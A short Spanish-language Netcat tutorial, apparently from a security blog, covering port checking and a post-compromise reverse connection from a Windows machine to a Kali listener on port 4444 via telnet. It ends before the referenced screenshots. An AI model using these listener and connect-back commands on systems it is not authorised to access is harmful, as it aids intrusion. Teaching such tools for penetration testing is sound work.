Si ejecutamos la ayuda:

nc -h

Vemos que Netcat tiene muchas posibilidades.

Si queremos conectarnos a un puerto de una máquina en concreto, tan solo tendremos que ejecutar:

nc -v [IP] [puerto]

Dependiendo de la respuesta sabremos si el puerto está o no abierto.

Supongamos que hemos conseguido el acceso a un sistema y nos queremos comunicar con el nuestro, es decir, queremos realizar una conexión reversa, desde el equipo comprometido al nuestro.

Para ello podemos utilizar Netcat con el comando:

nc –lvp [puerto]

En este caso hemos dejado a la escucha el puerto 4444 para conectarnos desde nuestra máquina comprometida.

Si ejecutamos telnet desde la máquina comprometida a dicho puerto:

telnet [IP] 4444

Crearemos un canal en el cual nos podemos enviar información.

Por ejemplo, en nuestra máquina Kali Linux tendremos la siguiente configuración:

Y en la máquina Windows podremos ver: